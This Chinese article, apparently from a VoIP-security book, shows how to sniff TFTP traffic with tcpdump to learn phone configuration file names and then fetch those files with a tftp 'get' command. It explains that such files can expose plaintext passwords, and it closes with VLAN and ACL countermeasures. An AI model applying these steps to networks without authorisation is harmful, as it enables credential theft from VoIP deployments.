嗅探TFTP配置文件传输

安全
嗅探网络中传输的TFTP配置文件就像监听其他任何UDP端口69(TFTP服务默认端口)上传输的流量一样简单。可以应用各种抓包工具来获取这些信息。

嗅探网络中传输的TFTP配置文件就像监听其他任何UDP端口69(TFTP服务默认端口)上传输的流量一样简单。可以应用各种抓包工具来获取这些信息。如"枚举TFTP服务器"部分中,这个过程只需要了解配置文件的真实文件名。应用tcpdump或者Wireshark(即以前的Ethereal),可以相当容易地完成此类操作。

  1. tcpdump dst port 69  
  2. tcpdump: listening on eth0  
  3. 02:43:18.899478 192.168.1.55.20000 > 192.168.1.103.tftp:  
  4. 22 RRQ "unidencom.txt"  
  5. 02:43:19.028863 192.168.1.55.19745 > 192.168.1.103.tftp:  
  6. 31 RRQ "uniden00e011030397.txt"  
  7. 02:43:37.878042 192.168.1.52.51154 > 192.168.1.103.tftp:  
  8. 31 RRQ "CTLSEP001562EA69E8.tlv" [tos 0x10]  
  9. 02:43:37.899329 192.168.1.52.51155 > 192.168.1.103.tftp:  
  10. 32 RRQ "SEP001562EA69E8.cnf.xml" [tos 0x10]  
  11. 02:43:37.919054 192.168.1.52.51156 > 192.168.1.103.tftp:  
  12. 28 RRQ "SIP001562EA69E8.cnf" [tos 0x10]  
  13. 02:43:37.968715 192.168.1.52.51157 > 192.168.1.103.tftp:  
  14. 23 RRQ "SIPDefault.cnf" [tos 0x10]  
  15. 02:43:38.017358 192.168.1.52.51158 > 192.168.1.103.tftp:  
  16. 30 RRQ "./SIP001562EA69E8.cnf" [tos 0x10]  
  17. 02:43:38.058998 192.168.1.52.51159 > 192.168.1.103.tftp:  
  18. 27 RRQ "P0S3-07-5-00.loads" [tos 0x10]  
  19. 02:43:56.777846 192.168.1.52.50642 > 192.168.1.103.tftp:  
  20. 23 RRQ "SIPDefault.cnf" [tos 0x10]  
  21. 02:43:56.943568 192.168.1.52.50643 > 192.168.1.103.tftp:  
  22. 30 RRQ "./SIP001562EA69E8.cnf" [tos 0x10]  
  23. 02:43:59.031713 192.168.1.52.50651 > 192.168.1.103.tftp:  
  24. 21 RRQ "RINGLIST.DAT" [tos 0x10]  
  25. 02:43:59.432906 192.168.1.52.50652 > 192.168.1.103.tftp:  
  26. 21 RRQ "dialplan.xml" [tos 0x10] 

如上可见,现在就知道了TFTP服务器上的配置文件的名称。于是,我们就可以从容地从TFTP服务器、应用Linux或者Windows的命令行直接下载这些文件。

  1. % tftp 192.168.1.103  
  2. tftp> get SIP001562EA69E8.cnf 

很多配置文件包含着敏感信息,如明文方式保存的用户名和密码。

TFTP嗅探对策

由于TFTP天生的不安全性,没有什么方法可以来保障这种通信方式的安全。可以采用的一个方法是为电话和TFTP服务器的通信创建一个单独的VLAN。这种方法的前提是TFTP服务器只为这些电话提供关于配置文件的服务。另外,应用防火墙ACL确保只有合法的IP地址段(如电话的DHCP IP地址段)能够访问TFTP服务器也能提高安全性。

【编辑推荐】

  1. HP Ignite-UX TFTP文件上传漏洞
  2. TFTPD32远程缓冲区溢出漏洞
  3. 如何使IRIS嗅探器在Win2003sp1上运行
  4. 无ARP欺骗嗅探技术原理与对其的简单应用
责任编辑:佟健 来源: 黑客大曝光:VoIP安全机密与解决方案
相关推荐

2013-08-20 16:44:33

2011-07-20 10:43:54

2010-12-01 11:41:52

Wireshark网络包分析捕获网络包

2012-08-29 16:24:15

2009-12-17 10:14:14

2011-07-19 13:08:10

2010-06-03 10:32:03

2010-10-12 14:01:01

2009-07-05 11:20:04

2009-07-15 20:44:17

2011-07-21 14:07:29

iPhone 网络 流量

2011-03-30 20:49:55

上网行为管理文件传输网康科技

2010-07-01 15:55:54

FTP文件传输协议

2010-06-28 14:25:16

2017-02-27 20:24:27

Linux文件传输命令

2012-08-31 14:23:06

2015-06-02 13:54:59

2010-12-06 13:44:08

NetStumblerWindows 802无线嗅探

2010-12-08 12:34:46

文件传输

2013-06-10 16:28:23

点赞
收藏

51CTO技术栈公众号